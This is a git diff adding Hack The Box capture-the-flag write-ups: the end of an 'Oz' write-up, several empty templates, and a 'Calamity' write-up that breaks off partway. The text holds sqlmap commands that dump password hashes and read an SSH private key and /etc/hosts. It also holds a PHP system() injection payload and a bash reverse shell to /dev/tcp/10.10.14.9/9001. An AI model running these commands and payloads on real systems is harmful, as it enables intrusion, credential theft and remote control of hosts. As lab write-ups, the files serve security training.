+ [14:45:31] [INFO] fetched data logged to text files under '/home/nothing/.local/share/sqlmap/output/10.10.10.96'
+
+ [*] ending @ 14:45:31 /2021-01-21/
+
+
+Now let's see if we can get the contents of the ozdb database:
+
+
+
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
+ → sqlmap -u http://10.10.10.96/users/ -D ozdb --batch --dump
+ ___
+ Table: users_gbw
+ [6 entries]
+ +----+----------------------------------------------------------------------------------------+-------------+
+ | id | password | username |
+ +----+----------------------------------------------------------------------------------------+-------------+
+ | 1 | $pbkdf2-sha256$5000$aA3h3LvXOseYk3IupVQKgQ$ogPU/XoFb.nzdCGDulkW3AeDZPbK580zeTxJnG0EJ78 | dorthi |
+ | 2 | $pbkdf2-sha256$5000$GgNACCFkDOE8B4AwZgzBuA$IXewCMHWhf7ktju5Sw.W.ZWMyHYAJ5mpvWialENXofk | tin.man |
+ | 3 | $pbkdf2-sha256$5000$BCDkXKuVMgaAEMJ4z5mzdg$GNn4Ti/hUyMgoyI7GKGJWeqlZg28RIqSqspvKQq6LWY | wizard.oz |
+ | 4 | $pbkdf2-sha256$5000$bU2JsVYqpbT2PqcUQmjN.Q$hO7DfQLTL6Nq2MeKei39Jn0ddmqly3uBxO/tbBuw4DY | coward.lyon |
+ | 5 | $pbkdf2-sha256$5000$Zax17l1Lac25V6oVwnjPWQ$oTYQQVsuSz9kmFggpAWB0yrKsMdPjvfob9NfBq4Wtkg | toto |
+ | 6 | $pbkdf2-sha256$5000$d47xHsP4P6eUUgoh5BzjfA$jWgyYmxDK.slJYUTsv9V9xZ3WWwcl9EBOsz.bARwGBQ | admin |
+ +----+----------------------------------------------------------------------------------------+-------------+
+
+ [14:47:36] [INFO] retrieved: 'db information loaded to ticket application for shared db access','12','GBR-9872'
+ Database: ozdb
+ Table: tickets_gbw
+ [12 entries]
+ +----+----------+--------------------------------------------------------------------------------------------------------------------------------+
+ | id | name | desc |
+ +----+----------+--------------------------------------------------------------------------------------------------------------------------------+
+ | 1 | GBR-987 | Reissued new id_rsa and id_rsa.pub keys for ssh access to dorthi. |
+ | 2 | GBR-1204 | Where did all these damn monkey's come from!? I need to call pest control. |
+ | 3 | GBR-1205 | Note to self: Toto keeps chewing on the curtain, find one with dog repellent. |
+ | 4 | GBR-1389 | Nothing to see here... V2hhdCBkaWQgeW91IGV4cGVjdD8= |
+ | 5 | GBR-4034 | Think of a better secret knock for the front door. Doesn't seem that secure, a Lion got in today. |
+ | 6 | GBR-5012 | I bet you won't read the next entry. |
+ | 7 | GBR-7890 | HAHA! Made you look. |
+ | 8 | GBR-7945 | Dorthi should be able to find her keys in the default folder under /home/dorthi/ on the db. |
+ | 9 | GBR-8011 | Seriously though, WW91J3JlIGp1c3QgdHJ5aW5nIHRvbyBoYXJkLi4uIG5vYm9keSBoaWRlcyBhbnl0aGluZyBpbiBiYXNlNjQgYW55bW9yZS4uLiBjJ21vbi4= |
+ | 10 | GBR-8042 | You are just wasting time now... someone else is getting user.txt |
+ | 11 | GBR-8457 | Look... now they've got root.txt and you don't even have user.txt |
+ | 12 | GBR-9872 | db information loaded to ticket application for shared db access |
+ +----+----------+--------------------------------------------------------------------------------------------------------------------------------+
+
+ [14:47:36] [INFO] table 'ozdb.tickets_gbw' dumped to CSV file '/home/nothing/.local/share/sqlmap/output/10.10.10.96/dump/ozdb/tickets_gbw.csv'
+ [14:47:36] [WARNING] HTTP error codes detected during run:
+ 500 (Internal Server Error) - 5 times
+ [14:47:36] [INFO] fetched data logged to text files under '/home/nothing/.local/share/sqlmap/output/10.10.10.96'
+
+ [*] ending @ 14:47:36 /2021-01-21/
+
+
+
+
+Now that we have MYSQL hashes, ozdb user hashes and possible ssh keys, we enumerate it further using the --file-read option, akthough it is not able to give us the user flag, it does give us the /etc/hosts file:
+
+
+
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
+ → sqlmap -u http://10.10.10.96/users/ --file-read=/etc/hosts --batch
+
+ [14:53:22] [INFO] the back-end DBMS operating system is Linux
+ [14:53:22] [INFO] fetching file: '/etc/hosts'
+ do you want confirmation that the remote file '/etc/hosts' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
+ [14:53:22] [INFO] the local file '/home/nothing/.local/share/sqlmap/output/10.10.10.96/files/_etc_hosts' and the remote file '/etc/hosts' have the same size (175 B)
+ files saved to [1]:
+ [*] /home/nothing/.local/share/sqlmap/output/10.10.10.96/files/_etc_hosts (same file)
+
+ [14:53:22] [INFO] fetched data logged to text files under '/home/nothing/.local/share/sqlmap/output/10.10.10.96'
+
+ [*] ending @ 14:53:22 /2021-01-21/
+
+
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
+ → cat /home/nothing/.local/share/sqlmap/output/10.10.10.96/files/_etc_hosts
+ 127.0.0.1 localhost
+ ::1 localhost ip6-localhost ip6-loopback
+ fe00::0 ip6-localnet
+ ff00::0 ip6-mcastprefix
+ ff02::1 ip6-allnodes
+ ff02::2 ip6-allrouters
+ 10.100.10.4 b9b370edd41a
+
+
+
+the randomly generated hostname is a hint that this is a docker container, next we grab the ssh keys:
+
+
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
+ → sqlmap -u http://10.10.10.96/users/ --file-read=/home/dorthi/.ssh/id_rsa --batch
+
+
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
+ → cat /home/nothing/.local/share/sqlmap/output/10.10.10.96/files/_home_dorthi_.ssh_id_rsa
+ -----BEGIN RSA PRIVATE KEY-----
+ Proc-Type: 4,ENCRYPTED
+ DEK-Info: AES-128-CBC,66B9F39F33BA0788CD27207BF8F2D0F6
+
+ RV903H6V6lhKxl8dhocaEtL4Uzkyj1fqyVj3eySqkAFkkXms2H+4lfb35UZb3WFC
+ b6P7zYZDAnRLQjJEc/sQVXuwEzfWMa7pYF9Kv6ijIZmSDOMAPjaCjnjnX5kJMK3F
+ e1BrQdh0phWAhhUmbYvt2z8DD/OGKhxlC7oT/49I/ME+tm5eyLGbK69Ouxb5PBty
+ h9A+Tn70giENR/ExO8qY4WNQQMtiCM0tszes8+guOEKCckMivmR2qWHTCs+N7wbz
+ a//JhOG+GdqvEhJp15pQuj/3SC9O5xyLe2mqL1TUK3WrFpQyv8lXartH1vKTnybd
+ 9+Wme/gVTfwSZWgMeGQjRXWe3KUsgGZNFK75wYtA/F/DB7QZFwfO2Lb0mL7Xyzx6
+ ZakulY4bFpBtXsuBJYPNy7wB5ZveRSB2f8dznu2mvarByMoCN/XgVVZujugNbEcj
+ evroLGNe/+ISkJWV443KyTcJ2iIRAa+BzHhrBx31kG//nix0vXoHzB8Vj3fqh+2M
+ EycVvDxLK8CIMzHc3cRVUMBeQ2X4GuLPGRKlUeSrmYz/sH75AR3zh6Zvlva15Yav
+ 5vR48cdShFS3FC6aH6SQWVe9K3oHzYhwlfT+wVPfaeZrSlCH0hG1z9C1B9BxMLQr
+ DHejp9bbLppJ39pe1U+DBjzDo4s6rk+Ci/5dpieoeXrmGTqElDQi+KEU9g8CJpto
+ bYAGUxPFIpPrN2+1RBbxY6YVaop5eyqtnF4ZGpJCoCW2r8BRsCvuILvrO1O0gXF+
+ wtsktmylmHvHApoXrW/GThjdVkdD9U/6Rmvv3s/OhtlAp3Wqw6RI+KfCPGiCzh1V
+ 0yfXH70CfLO2NcWtO/JUJvYH3M+rvDDHZSLqgW841ykzdrQXnR7s9Nj2EmoW72IH
+ znNPmB1LQtD45NH6OIG8+QWNAdQHcgZepwPz4/9pe2tEqu7Mg/cLUBsTYb4a6mft
+ icOX9OAOrcZ8RGcIdVWtzU4q2YKZex4lyzeC/k4TAbofZ0E4kUsaIbFV/7OMedMC
+ zCTJ6rlAl2d8e8dsSfF96QWevnD50yx+wbJ/izZonHmU/2ac4c8LPYq6Q9KLmlnu
+ vI9bLfOJh8DLFuqCVI8GzROjIdxdlzk9yp4LxcAnm1Ox9MEIqmOVwAd3bEmYckKw
+ w/EmArNIrnr54Q7a1PMdCsZcejCjnvmQFZ3ko5CoFCC+kUe1j92i081kOAhmXqV3
+ c6xgh8Vg2qOyzoZm5wRZZF2nTXnnCQ3OYR3NMsUBTVG2tlgfp1NgdwIyxTWn09V0
+ nOzqNtJ7OBt0/RewTsFgoNVrCQbQ8VvZFckvG8sV3U9bh9Zl28/2I3B472iQRo+5
+ uoRHpAgfOSOERtxuMpkrkU3IzSPsVS9c3LgKhiTS5wTbTw7O/vxxNOoLpoxO2Wzb
+ /4XnEBh6VgLrjThQcGKigkWJaKyBHOhEtuZqDv2MFSE6zdX/N+L/FRIv1oVR9VYv
+ QGpqEaGSUG+/TSdcANQdD3mv6EGYI+o4rZKEHJKUlCI+I48jHbvQCLWaR/bkjZJu
+ XtSuV0TJXto6abznSC1BFlACIqBmHdeaIXWqH+NlXOCGE8jQGM8s/fd/j5g1Adw3
+ -----END RSA PRIVATE KEY-----
+
+
+
+
+
+This is an encrypted private key, so we could try to crack it using johnby first turning it into a hash
+
+
+
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~/_HTB/oz]
+ → locate ssh2john
+ /usr/share/john/ssh2john.py
+
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~/_HTB/oz]
+ → python $(locate ssh2john)
+ Usage: /usr/share/john/ssh2john.py
+
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~/_HTB/oz]
+ → python $(locate ssh2john) id_rsa > hash
+
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~/_HTB/oz]
+ → cat hash
+ id_rsa:$sshng$1$16$66B9F39F33BA0788CD27207BF8F2D0F6$1200$455f74dc7e95ea584ac65f1d86871a12d2f85339328f57eac958f77b24aa9001649179acd87fb895f6f7e5465bdd61426fa3fbcd864302744b42324473fb10557bb01337d631aee9605f4abfa8a32199920ce3003e36828e78e75f990930adc57b506b41d874a615808615266d8beddb3f030ff3862a1c650bba13ff8f48fcc13eb66e5ec8b19b2baf4ebb16f93c1b7287d03e4e7ef482210d47f1313bca98e1635040cb6208cd2db337acf3e82e384282724322be6476a961d30acf8def06f36bffc984e1be19daaf121269d79a50ba3ff7482f4ee71c8b7b69aa2f54d42b75ab169432bfc9576abb47d6f2939f26ddf7e5a67bf8154dfc1265680c78642345759edca52c80664d14aef9c18b40fc5fc307b4191707ced8b6f498bed7cb3c7a65a92e958e1b16906d5ecb812583cdcbbc01e59bde4520767fc7739eeda6bdaac1c8ca0237f5e055566e8ee80d6c47237afae82c635effe212909595e38dcac93709da221101af81cc786b071df5906fff9e2c74bd7a07cc1f158f77ea87ed8c132715bc3c4b2bc0883331dcddc45550c05e4365f81ae2cf1912a551e4ab998cffb07ef9011df387a66f96f6b5e586afe6f478f1c7528454b7142e9a1fa4905957bd2b7a07cd887095f4fec153df69e66b4a5087d211b5cfd0b507d07130b42b0c77a3a7d6db2e9a49dfda5ed54f83063cc3a38b3aae4f828bfe5da627a8797ae6193a84943422f8a114f60f02269b686d80065313c52293eb376fb54416f163a6156a8a797b2aad9c5e191a9242a025b6afc051b02bee20bbeb3b53b481717ec2db24b66ca5987bc7029a17ad6fc64e18dd564743f54ffa466befdecfce86d940a775aac3a448f8a7c23c6882ce1d55d327d71fbd027cb3b635c5ad3bf25426f607dccfabbc30c76522ea816f38d7293376b4179d1eecf4d8f6126a16ef6207ce734f981d4b42d0f8e4d1fa3881bcf9058d01d40772065ea703f3e3ff697b6b44aaeecc83f70b501b1361be1aea67ed89c397f4e00eadc67c4467087555adcd4e2ad982997b1e25cb3782fe4e1301ba1f674138914b1a21b155ffb38c79d302cc24c9eab94097677c7bc76c49f17de9059ebe70f9d32c7ec1b27f8b36689c7994ff669ce1cf0b3d8aba43d28b9a59eebc8f5b2df38987c0cb16ea82548f06cd13a321dc5d97393dca9e0bc5c0279b53b1f4c108aa6395c007776c49987242b0c3f12602b348ae7af9e10edad4f31d0ac65c7a30a39ef990159de4a390a81420be9147b58fdda2d3cd643808665ea57773ac6087c560daa3b2ce8666e70459645da74d79e7090dce611dcd32c5014d51b6b6581fa75360770232c535a7d3d5749cecea36d27b381b74fd17b04ec160a0d56b0906d0f15bd915c92f1bcb15dd4f5b87d665dbcff6237078ef6890468fb9ba8447a4081f39238446dc6e32992b914dc8cd23ec552f5cdcb80a8624d2e704db4f0ecefefc7134ea0ba68c4ed96cdbff85e710187a5602eb8d38507062a282458968ac811ce844b6e66a0efd8c15213acdd5ff37e2ff15122fd68551f5562f406a6a11a192506fbf4d275c00d41d0f79afe8419823ea38ad92841c929494223e238f231dbbd008b59a47f6e48d926e5ed4ae5744c95eda3a69bce7482d4116500222a0661dd79a2175aa1fe3655ce08613c8d018cf2cfdf77f8f983501dc37
+
+
+
+
+However the intended path was to crack the hashes we got from ozdb, particularly wizard.oz's password hash
+
+
+ Table: users_gbw
+ [6 entries]
+ +----+----------------------------------------------------------------------------------------+-------------+
+ | id | password | username |
+ +----+----------------------------------------------------------------------------------------+-------------+
+ | 1 | $pbkdf2-sha256$5000$aA3h3LvXOseYk3IupVQKgQ$ogPU/XoFb.nzdCGDulkW3AeDZPbK580zeTxJnG0EJ78 | dorthi |
+ | 2 | $pbkdf2-sha256$5000$GgNACCFkDOE8B4AwZgzBuA$IXewCMHWhf7ktju5Sw.W.ZWMyHYAJ5mpvWialENXofk | tin.man |
+ | 3 | $pbkdf2-sha256$5000$BCDkXKuVMgaAEMJ4z5mzdg$GNn4Ti/hUyMgoyI7GKGJWeqlZg28RIqSqspvKQq6LWY | wizard.oz |
+ | 4 | $pbkdf2-sha256$5000$bU2JsVYqpbT2PqcUQmjN.Q$hO7DfQLTL6Nq2MeKei39Jn0ddmqly3uBxO/tbBuw4DY | coward.lyon |
+ | 5 | $pbkdf2-sha256$5000$Zax17l1Lac25V6oVwnjPWQ$oTYQQVsuSz9kmFggpAWB0yrKsMdPjvfob9NfBq4Wtkg | toto |
+ | 6 | $pbkdf2-sha256$5000$d47xHsP4P6eUUgoh5BzjfA$jWgyYmxDK.slJYUTsv9V9xZ3WWwcl9EBOsz.bARwGBQ | admin |
+ +----+----------------------------------------------------------------------------------------+-------------+
+
+
+
+so we crack it using john and rockyou.txt and we get the password wizardofoz22, so let's login:
+
+ 
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/14.md b/Hard/14.md
new file mode 100644
index 0000000..7697a93
--- /dev/null
+++ b/Hard/14.md
@@ -0,0 +1,66 @@
+# Zipper Writeup
+
+
+
+## Introduction :
+
+Zipper is a hard linux box released back in October 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/15.md b/Hard/15.md
new file mode 100644
index 0000000..0899be2
--- /dev/null
+++ b/Hard/15.md
@@ -0,0 +1,66 @@
+# Conceal Writeup
+
+
+
+## Introduction :
+
+Conceal is a hard windows box released back in January 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/16.md b/Hard/16.md
new file mode 100644
index 0000000..6802307
--- /dev/null
+++ b/Hard/16.md
@@ -0,0 +1,66 @@
+# FluJab Writeup
+
+
+
+## Introduction :
+
+FluJab is a hard linux box released back in January 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/17.md b/Hard/17.md
new file mode 100644
index 0000000..6254606
--- /dev/null
+++ b/Hard/17.md
@@ -0,0 +1,66 @@
+# Helpline Writeup
+
+
+
+## Introduction :
+
+Helpline is a hard windows box released back in March 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/18.md b/Hard/18.md
new file mode 100644
index 0000000..e177751
--- /dev/null
+++ b/Hard/18.md
@@ -0,0 +1,66 @@
+# OneTwoSeven Writeup
+
+
+
+## Introduction :
+
+OneTwoSeven is a hard linux box released back in April 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/19.md b/Hard/19.md
new file mode 100644
index 0000000..93714d9
--- /dev/null
+++ b/Hard/19.md
@@ -0,0 +1,66 @@
+# Ghoul Writeup
+
+
+
+## Introduction :
+
+Ghoul is a hard linux box released back in may 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/2.md b/Hard/2.md
new file mode 100644
index 0000000..f15a77f
--- /dev/null
+++ b/Hard/2.md
@@ -0,0 +1,499 @@
+# Calamity Writeup
+
+
+
+## Introduction :
+
+Calamity is a hard linux box released back in June 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.9/23 ] [ /dev/pts/9 ] [~/_HTB/Calamity]
+ → sudo nmap -vvv -sTU -p- 10.10.10.27 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+ [sudo] password for nothing:
+ Discovered open port 80/tcp on 10.10.10.27
+ Discovered open port 22/tcp on 10.10.10.27
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.9/23 ] [ /dev/pts/9 ] [~/_HTB/Calamity]
+ → nmap -sCV -p80,22 10.10.10.27
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-07 15:55 BST
+ Nmap scan report for 10.10.10.27
+ Host is up (0.029s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 b6:46:31:9c:b5:71:c5:96:91:7d:e4:63:16:f9:59:a2 (RSA)
+ | 256 10:c4:09:b9:48:f1:8c:45:26:ca:f6:e1:c2:dc:36:b9 (ECDSA)
+ |_ 256 a8:bf:dd:c0:71:36:a8:2a:1b:ea:3f:ef:66:99:39:75 (ED25519)
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Brotherhood Software
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 8.00 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+
+
+ [ 10.10.14.9/23 ] [ /dev/pts/9 ] [~/_HTB/Calamity]
+ → gobuster dir -u http://10.10.10.27 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -t 50
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+ [+] Url: http://10.10.10.27
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
+ [+] Status codes: 200,204,301,302,307,401,403
+ [+] User Agent: gobuster/3.0.1
+ [+] Extensions: html,php,asp,aspx,jsp,txt
+ [+] Timeout: 10s
+ ===============================================================
+ 2020/08/07 16:00:31 Starting gobuster
+ ===============================================================
+ /index.md (Status: 200)
+ /uploads (Status: 301)
+ /admin.php (Status: 200)
+ Progress: 20842 / 220561 (9.45%)
+
+
+
+Running gobuster we see that we have an interesting admin.php webpage:
+
+
+
+And we get a commented line which hints us towards a password: "skoupidotenekes", so blindly we test the credentials admin:skoupidotenekes:
+
+
+
+Now here the idea is to send GET requests to this admin.php page and test wether or not we can execute html code on it, and if we can, testing if we can execute php code (which would hopefully allow us to spawn a reverse shell).
+
+
+
+Once the request is sent to the repeater, we change the html parameter to see if we can get anything:
+
+
+
+And it looks like we are able to send and execute our own html code ! now let's see if we can execute php code:
+
+
+ <****?php echo "nihilist"; ?>
+
+
+
+Now let's see if we can print out the phpinfo() function:
+
+
+ http://10.10.10.27/admin.php?html=%3C%3fphp+phpinfo()%3b+%3f%3E
+
+
+
+ 
+
+It doesn't seem we can't get a reverse shell and/or execute commands so now let's try to execute commands on the machine os from our php injection:
+
+
+ <****?php system($_REQUEST["cmd"]); ?>
+
+Here we request the parameter cmd, and so we add another parameter to set the cmd variable to "id" to see as which user we can execute our commands
+
+
+ &cmd;=id
+
+
+
+which gives us this request:
+
+
+ <%3fphp+system($_REQUEST["cmd"])%3b+%3f>&cmd;=id
+
+
+
+` 
+
+And we can execute commands as www-data! now let's get a reverse shell onto the box:
+
+
+ <%3fphp+system($_REQUEST["cmd"])%3b+%3f>&cmd;=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.9/9001+0>%261'
+
+
+
+Here is our GET request:
+
+
+ GET /admin.php?html=<%3fphp+system($_REQUEST["cmd"])%3b+%3f>&cmd;=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.9/9001+0>%261' HTTP/1.1
+ Host: 10.10.10.27
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ Referer: http://10.10.10.27/admin.php
+ Connection: close
+ Cookie: adminpowa=noonecares
+ Upgrade-Insecure-Requests: 1
+
+
+
+` 
+
+And we get a reverse shell ! However our reverse shell dies quickly which means that we probably have to do it manually without a reverse shell for now:
+
+
+ /admin.php?html=<%3fphp+system($_REQUEST["cmd"])%3b+%3f>&cmd;=cat+/etc/passwd
+
+
+
+` 
+
+And we get the username xalvas! so let's try to read the userflag in the directory /home/xalvas/user.txt
+
+
+
+And that's it ! we have been able to read the user flag.
+
+## **Part 3 : Getting Root Access**
+
+We can print out the user flag from our php code injection, but we need to get root access we need to poke around the box further:
+
+
+
+Here we see that there is a file called recov.wav so we get it onto our box using base64 copypasting
+
+
+
+Here we can just right click the response, and hit "copy to file"
+
+
+
+Edit out the html part in nano, and then decode the b64 and use the "file" command utility to print out extra info about recov.wav:
+
+
+
+ [ 10.10.14.9/23 ] [ /dev/pts/16 ] [~/_HTB/Calamity]
+ → file recov.wav.b64.req
+ recov.wav.b64.req: HTML document, ASCII text, with CRLF, LF line terminators
+
+ [ 10.10.14.9/23 ] [ /dev/pts/16 ] [~/_HTB/Calamity]
+ → nano recov.wav.b64.req
+
+ [ 10.10.14.9/23 ] [ /dev/pts/16 ] [~/_HTB/Calamity]
+ → mv recov.wav.b64.req recov.wav.b64
+
+ [ 10.10.14.9/23 ] [ /dev/pts/16 ] [~/_HTB/Calamity]
+ → base64 -d recov.wav.b64 > recov.wavv
+ base64: invalid input
+
+ [ 10.10.14.9/23 ] [ /dev/pts/16 ] [~/_HTB/Calamity]
+ → base64 -di recov.wav.b64 > recov.wav
+
+ [ 10.10.14.9/23 ] [ /dev/pts/16 ] [~/_HTB/Calamity]
+ → file recov.wav
+ recov.wav: RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, stereo 44100 Hz
+
+ [ 10.10.14.9/23 ] [ /dev/pts/16 ] [~/_HTB/Calamity]
+ → audacity recov.wav
+
+
+` 
+
+The audio wav file is basically a rickroll track But if we invert one of the 2 audio files in audacity, we can hear the difference in between the 2 files and it says the following
+
+
+ 47936..* your password is 185
+
+
+
+put back in place it says:
+
+
+ your password is 18547936..*
+
+
+
+so we try to login via ssh with the credentials xalvas:18547936..*
+
+
+ [ 10.10.14.9/23 ] [ /dev/pts/11 ] [~]
+ → ssh xalvas@10.10.10.27
+ The authenticity of host '10.10.10.27 (10.10.10.27)' can't be established.
+ ECDSA key fingerprint is SHA256:yT6ino7wgCPkMVczALjJ+BeH7VZB+It79p9HRVPEyuY.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.27' (ECDSA) to the list of known hosts.
+ xalvas@10.10.10.27's password:
+ Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-81-generic i686)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ 9 packages can be updated.
+ 8 updates are security updates.
+
+
+ Last login: Fri Jun 30 08:27:25 2017 from 10.10.13.44
+ xalvas@calamity:~$ id
+ uid=1000(xalvas) gid=1000(xalvas) groups=1000(xalvas),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
+ xalvas@calamity:~$
+
+
+Now by typing id we saw that xalvas is part of the lxd group, and this can be compared to being in a docker group. so first of all let's get an alpine linux docker image on our machine:
+
+
+
+ xalvas@calamity:~$ id
